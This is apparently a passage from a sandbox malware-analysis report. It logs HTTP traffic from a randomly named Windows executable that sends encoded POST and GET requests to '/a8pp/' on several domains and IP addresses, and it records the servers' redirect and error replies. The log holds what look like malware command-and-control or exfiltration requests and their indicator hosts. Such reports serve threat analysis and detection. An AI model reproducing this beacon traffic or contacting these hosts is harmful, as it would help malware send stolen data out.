                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=j0GBBrzuI5cg6dE+JNAUhHsOlbhgZig7NqMJIEeT840G0vABLH0Xv7YlBhOjOEq4zS9lkXBZEpkUPw5kaYFKBe5Cx04ZKGrrEUmPp2WLii6X0rkJ19kplV8u9WUnrkQ9p95L9Qa+3ft0DpycdkNmrtkcwCO30p+CixxVYP13EC/ae48YhmCLj/CZwsOza23Zkg==
                                        Jun 4, 2024 14:37:09.588268995 CEST | 376 | IN | HTTP/1.1 302 Found
                                        cache-control: max-age=0, private, must-revalidate
                                        connection: close
                                        content-length: 11
                                        date: Tue, 04 Jun 2024 12:37:08 GMT
                                        location: http://survey-smiles.com
                                        server: nginx
                                        set-cookie: sid=28ef2a05-226f-11ef-bb48-bc9b676f98d5; path=/; domain=.seductionsessions.co.uk; expires=Sun, 22 Jun 2092 15:51:16 GMT; max-age=2147483647; HttpOnly
                                        Data Ascii: Redirecting


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        38 | 192.168.11.30 | 49832 | 23.82.12.29 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:37:12.106271982 CEST | 786 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.seductionsessions.co.uk
                                        Origin: http://www.seductionsessions.co.uk
                                        Referer: http://www.seductionsessions.co.uk/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=j0GBBrzuI5cg580+KqUUqHsJ5rhgLig/NqQJIFqD7KQG0LEBEiUXjbYlTBOsKEqjzSwakVFZEoEUP09kavZJOu5ApE4bX2rrEUmPp3zeijSX3a0J1fcqjl9cpGUnvkQhp94u9R2U3ah0Dr6ca1Nnltke+iOn1YL67TF/U8RPCAu/fvNC8l2Jwf+0stjbY02C5mEmtjfEqZkJSKdgEyjwoD8=
                                        Jun 4, 2024 14:37:12.239658117 CEST | 376 | IN | HTTP/1.1 302 Found
                                        cache-control: max-age=0, private, must-revalidate
                                        connection: close
                                        content-length: 11
                                        date: Tue, 04 Jun 2024 12:37:11 GMT
                                        location: http://survey-smiles.com
                                        server: nginx
                                        set-cookie: sid=2a83f4f0-226f-11ef-81e6-bc9b01a9cbc5; path=/; domain=.seductionsessions.co.uk; expires=Sun, 22 Jun 2092 15:51:19 GMT; max-age=2147483647; HttpOnly
                                        Data Ascii: Redirecting


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        39 | 192.168.11.30 | 49833 | 23.82.12.29 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:37:14.764712095 CEST | 1703 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.seductionsessions.co.uk
                                        Origin: http://www.seductionsessions.co.uk
                                        Referer: http://www.seductionsessions.co.uk/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8= [TRUNCATED]
                                        Jun 4, 2024 14:37:15.074223042 CEST | 376 | IN | HTTP/1.1 302 Found
                                        cache-control: max-age=0, private, must-revalidate
                                        connection: close
                                        content-length: 11
                                        date: Tue, 04 Jun 2024 12:37:14 GMT
                                        location: http://survey-smiles.com
                                        server: nginx
                                        set-cookie: sid=2c1a1ca2-226f-11ef-86a8-bc9bf24bb264; path=/; domain=.seductionsessions.co.uk; expires=Sun, 22 Jun 2092 15:51:22 GMT; max-age=2147483647; HttpOnly
                                        Data Ascii: Redirecting


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        40 | 192.168.11.30 | 49834 | 23.82.12.29 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:37:17.421441078 CEST | 477 | OUT | GET /a8pp/?2NlhHLS8=u2uhCbPEKv8ZkpElCasipCYoh7hjVHsJeshUYXe+26UO54wjNRlGrJIqe2/bB2Gg6hxh2QUpPcZvKht3Zd5FEOczln0DFiPIHlW4j3CMtDHw4ZJy68kQvjE=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.seductionsessions.co.uk
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:37:17.705903053 CEST | 1096 | IN | HTTP/1.1 200 OK
                                        accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                        cache-control: max-age=0, private, must-revalidate
                                        connection: close
                                        content-length: 641
                                        content-type: text/html; charset=utf-8
                                        date: Tue, 04 Jun 2024 12:37:16 GMT
                                        server: nginx
                                        set-cookie: sid=2daf6efa-226f-11ef-b4a2-bc9b1f251352; path=/; domain=.seductionsessions.co.uk; expires=Sun, 22 Jun 2092 15:51:24 GMT; max-age=2147483647; HttpOnly
                                        Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.seductionsessions.co.uk/a8pp/?0z=jXZhddsppL&2NlhHLS8=u2uhCbPEKv8ZkpElCasipCYoh7hjVHsJeshUYXe+26UO54wjNRlGrJIqe2%2FbB2Gg6hxh2QUpPcZvKht3Zd5FEOczln0DFiPIHlW4j3CMtDHw4ZJy68kQvjE%3D&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcxNzUxMTgzNywiaWF0IjoxNzE3NTA0NjM3LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydmFzcW5ocTM3YTlkNDFmZmsxOTlnaWUiLCJuYmYiOjE3MTc1MDQ2MzcsInRzIjoxNzE3NTA0NjM3NDk3MDI3fQ.DtA4imPzyuPANtGNRQR6fhM5o9jS7Oq2fvL2B7QWD-k&sid=2daf6efa-226f-11ef-b4a2-bc9b1f251352');</script></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        41 | 192.168.11.30 | 49835 | 91.195.240.19 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:37:23.129023075 CEST | 739 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.calmparents.us
                                        Origin: http://www.calmparents.us
                                        Referer: http://www.calmparents.us/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=Ai4JKom2AHw4Hqlx58Xc5psHzZk7R7zOOIL3DLQqVcCGDmZg6atES603RFkZQdYxls2i79qlM0re740CuMqsk9oWxhyu8nLdPYmBqpELBqVE8xZxxq6BO8+Bri9BxX8e2h0amAB1yMHMIq5KwxXnLDFpR/U+rZdQ/V7RXXSLpgJJe8B16swCnQYoJVpImt6Qfw==
                                        Jun 4, 2024 14:37:23.353728056 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        42 | 192.168.11.30 | 49836 | 91.195.240.19 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:37:25.886507988 CEST | 759 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.calmparents.us
                                        Origin: http://www.calmparents.us
                                        Referer: http://www.calmparents.us/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=Ai4JKom2AHw4ELVx1/vc/JsAtJk7KLzKOIP3DOwAUuWGECVg9YVER603alkYPNY6ls6c75ilM0/e75ECu/CvltoQ9ByoiXLdPYmBqoghBuxE8hpxzL6CN8+Coi9Bmn8S2h1/mC0gyO/MIrJKwgXkFzFrffVvraol/FTYZwvRolI9SLwvnvEA0wkFVUEgkv7LC+PZmKLXtO7G5br1CgOx/LU=
                                        Jun 4, 2024 14:37:26.112297058 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        43 | 192.168.11.30 | 49837 | 91.195.240.19 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:37:28.636523962 CEST | 1676 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.calmparents.us
                                        Origin: http://www.calmparents.us
                                        Referer: http://www.calmparents.us/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8= [TRUNCATED]
                                        Jun 4, 2024 14:37:28.863012075 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        44 | 192.168.11.30 | 49838 | 91.195.240.19 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:37:31.388113022 CEST | 468 | OUT | GET /a8pp/?2NlhHLS8=NgQpJdLFdHgIa+1l29O1770Oq5lPJcvTMZvJdcQ/YcKsMhli5q4lfY4xaSICRuQBpvWxqNirPVzUz7JPsPacp8Mg1AroxlnuY82gnIQ9XdoCkQd3w5aTNck=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.calmparents.us
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:37:31.617096901 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        45 | 192.168.11.30 | 49839 | 162.240.81.18 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:37:37.118160009 CEST | 748 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.tintasmaiscor.com
                                        Origin: http://www.tintasmaiscor.com
                                        Referer: http://www.tintasmaiscor.com/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=1JzWdba+1jGac2AmChM8U9XX8w6Gb7PpyVBSf92Og0hPRlreypzKCJShA1LqyMWN3pZCRPD7mCA23wIpQyghokHYXLl/2KlsU7X0mFPER2xcFTxaLpjgPdNcY85YjyHW18/ME5KCY0rSjPj+swQiQTUJeCSYFgmQyWVLrkNWgiHuqzVvV9QB80bnW5rA2fdohw==
                                        Jun 4, 2024 14:37:37.291728020 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 04 Jun 2024 12:37:37 GMT
                                        Content-Type: text/html
                                        Content-Length: 3650
                                        Connection: close
                                        ETag: "636d2d22-e42"
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                        Jun 4, 2024 14:37:37.291742086 CEST | 1289 | IN
                                        Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                        Jun 4, 2024 14:37:37.291877985 CEST | 1245 | IN
                                        Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        46 | 192.168.11.30 | 49840 | 162.240.81.18 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:37:39.808584929 CEST | 768 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.tintasmaiscor.com
                                        Origin: http://www.tintasmaiscor.com
                                        Referer: http://www.tintasmaiscor.com/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=1JzWdba+1jGadXQmEGQ8DNXQgA6GCLPtyU9Sf5vTjGVPfnzexozKHJShPVLz8sWS3pU/RLH7mDg230MpQB4gp0HNarlur6lsU7X0mEriR2pcEgpaEojnF9NTOs5YpSGR18/6E7/fY2jSjKP+thQhLjUDTiT3ByPDzStXnFpdu3eVmEk1I+kDvUnKK4Go0dcz87sMjXROmfXcO1vHyMJJQ7w=
                                        Jun 4, 2024 14:37:39.975148916 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 04 Jun 2024 12:37:39 GMT
                                        Content-Type: text/html
                                        Content-Length: 3650
                                        Connection: close
                                        ETag: "636d2d22-e42"
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                        Jun 4, 2024 14:37:39.975162983 CEST | 1289 | IN | Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                        Jun 4, 2024 14:37:39.975266933 CEST | 1245 | IN | Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        47 | 192.168.11.30 | 49841 | 162.240.81.18 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:37:42.517452955 CEST | 1685 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.tintasmaiscor.com
                                        Origin: http://www.tintasmaiscor.com
                                        Referer: http://www.tintasmaiscor.com/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8= [TRUNCATED]
                                        Jun 4, 2024 14:37:42.690855026 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 04 Jun 2024 12:37:42 GMT
                                        Content-Type: text/html
                                        Content-Length: 3650
                                        Connection: close
                                        ETag: "636d2d22-e42"
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                        Jun 4, 2024 14:37:42.690869093 CEST | 1289 | IN | Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                        Jun 4, 2024 14:37:42.690972090 CEST | 1245 | IN | Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        48 | 192.168.11.30 | 49842 | 162.240.81.18 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:37:45.221573114 CEST | 471 | OUT | GET /a8pp/?2NlhHLS8=4Lb2evqbqWm/eQEsCRZbIPf+4WOFbtHQ6zBEferLjExJaXLZsL3GLbWlHTrS18+QwpI6CqjMoX8o4lQjVBd1hnajfrB87pxWL6PWkXnwG2oHKjYPIKLzKN0=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.tintasmaiscor.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:37:45.394918919 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 04 Jun 2024 12:37:45 GMT
                                        Content-Type: text/html
                                        Content-Length: 3650
                                        Connection: close
                                        ETag: "636d2d22-e42"
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                        Jun 4, 2024 14:37:45.394933939 CEST | 1289 | IN | Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                        Jun 4, 2024 14:37:45.395042896 CEST | 1245 | IN | Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        49 | 192.168.11.30 | 49843 | 192.207.62.21 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:37:52.571449995 CEST | 730 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.vgjimei.icu
                                        Origin: http://www.vgjimei.icu
                                        Referer: http://www.vgjimei.icu/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=DKy/imlKCQqWoQ6f2sibS5YTpsJ4aw9u2bcl76NuWlRQ/j/eEQlQRlCLSauyNw6iO+rUjFuN01ptrAC0uDiAu+q7QnzHZ8daph8IiLWnrT+UaINpurKdPa7wngGg+07Rrl361rTw/7btC3dMC0nBeUJR7h8cqFrotAJSAJn20KOk0IyFaqY8qBPTZgaYzA9MDQ==
                                        Jun 4, 2024 14:37:52.743582010 CEST | 1176 | IN | HTTP/1.1 403 Forbidden
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:37:52 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Cache-Control: no-cache
                                        Content-Encoding: gzip


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        50 | 192.168.11.30 | 49844 | 192.207.62.21 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:37:55.275408983 CEST | 750 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.vgjimei.icu
                                        Origin: http://www.vgjimei.icu
                                        Referer: http://www.vgjimei.icu/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=DKy/imlKCQqW6gKf6vabUZYQ0cJ4UQ9q2agl774rWWlQ/CPeWURQWlCLKquNDQ7sO+X2jESN01VtrEK0tyiPhOq1fHzZGsdaph8IiKnCrSWUZ9FpvKKcB67zvAGg606Wrl3I1vTa/5jtC2BMFlnOHEJXmx9MuFKStw5QMeatzvCYxfDfHps+5hz+Fh3wxC8XeSX+ii/XIHfQB62K6Orlbr4=
                                        Jun 4, 2024 14:37:55.445801020 CEST | 1176 | IN | HTTP/1.1 403 Forbidden
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:37:55 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Cache-Control: no-cache
                                        Content-Encoding: gzip


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        51 | 192.168.11.30 | 49845 | 192.207.62.21 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:37:57.981617928 CEST | 1667 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.vgjimei.icu
                                        Origin: http://www.vgjimei.icu
                                        Referer: http://www.vgjimei.icu/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
